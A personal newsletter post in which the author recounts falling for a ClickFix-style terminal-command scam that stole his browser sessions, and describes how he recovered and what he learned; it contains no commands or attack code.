Hello reader,
A few weeks back, I was hacked, and almost all of my login credentials were compromised.
My Instagram was hacked, my Reddit and LinkedIn accounts were restricted, someone ordered a $400 camera lens from my Amazon account, and my Uber account was used to gift a $170 giftcard.
Very interesting experience, to say the least.
I almost didn’t want to share this experience, because I was a little embarrassed. I like to think that I have a good sense of technology, and I think I wouldn’t really be hacked, like ever.
But I was, and it was scary for a bit, but somehow I was able to overcome it.
I am sharing the story here because I think it could help somebody else at some point in time.
This post is a summary of what happened, the mistakes I made, and how I fixed it (almost).
How did it happen?
The hack began when I went on the internet to download something. I am usually pretty careful when I’m on the internet, but this particular time, I was in a rush to complete something I was working on.
So I went to a site and tried to download something. I was redirected to a page that had a command that was supposed to help me download the file using the terminal, which would definitely be faster.
I have installed apps and files through the terminal before, and they have been safe. But every time, I have checked what the command is.
But this time, since I was in a rush, I just assumed that the command would be okay. So I copied the command, pasted it in my terminal, and launched it.
I was prompted for my admin password, and I should’ve hard rebooted my computer right then, but I entered the password, and that’s where the problem began.
Although the command appeared to have the file I was looking for, it actually installed a bunch of silent malware.
For about a week after that command, nothing happened, but after about a week, someone posted an Instagram story from my account, some crypto thing, which I’d definitely not do.
A friend texted me, so I was able to immediately secure that account.
After a day or two, I got an email saying my Reddit account was restricted. Very interesting because I never use Reddit. I recovered and secured that, too. Then, my Amazon account was used to place an order.
That is when I realized what had actually happened.
The hack that I fell for is called a ClickFix hack. It uses a safe-looking terminal command to have the user install malware on their device, and then it silently sends your browser cache to a hacker.
Why is this so effective?
There are multiple layers of security to protect an account. It could be a verification link, two-step authentication, or even the new passkeys. But these credentials are only used when you try to log into an account.
Once you’re logged in, you don’t have to log in again anytime soon. The reason this works is that your browser remembers that you’re authorized. That memory is called the cache.
This means that if someone is able to get access to your browser memory/cache, they don’t even have to log into anything. They could easily access everything you were logged into without ever needing to verify anything.
Incredible.
My defence
After researching a bunch, I realized that the first thing I’d have to do was monitor the incoming and outgoing network requests from my computer. I used an app called LuLu, which did a good job at that.
I was able to find most of the installed daemons (a program that runs as a background process, rather than being under the direct control of an interactive user), but I still couldn’t get everything.
Even if I tried resetting my passwords from the current computer, it wouldn’t help because the new password could also be compromised.
I knew I would have to totally wipe my computer and not try to recover anything from my current setup, since anything could have the malware.
So that’s what I did. I wiped out my entire computer and set it all up from the beginning.
Then I reset all my passwords, but for some of the things, it was probably too late. I’m still trying to recover my restricted LinkedIn account. If it doesn’t work, I may have to start all over again there.
Also, I didn’t lose any money because I was able to mark the Uber transaction as fraudulent and got a new credit card.
Lessons
I am never going to execute a command in my terminal without understanding what it would do. When I run a command, I am definitely not entering my administrator password unless the source is trusted.
I’m hoping this will help me not get myself into a weird situation again.
Very interesting experience indeed.
I’ll see you next week.
Warmly,
Suraj
